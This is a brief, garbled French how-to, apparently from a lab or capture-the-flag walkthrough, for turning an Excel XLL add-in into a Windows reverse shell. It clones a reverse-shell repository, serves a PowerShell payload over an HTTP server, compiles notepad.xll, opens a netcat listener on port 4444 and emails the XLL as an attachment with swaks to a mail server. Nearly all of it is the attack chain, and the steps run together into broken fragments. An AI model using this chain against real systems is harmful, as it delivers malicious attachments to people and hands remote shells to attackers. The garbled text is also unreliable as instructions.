
xll windows reverse shell
xll windows reverse shell
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1python3 -m http.server 9999
notpadXLL.c vers votre machine attaquante Windows et mettez à jour le notpadXLL.c en conséquence.x64 Native Tools Command Prompt for VS 2022notepad.xllcl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll vers votre machine Kaliswaks curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
swaks pour envoyer un e-mail avec notepad.xll en pièce jointe :./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
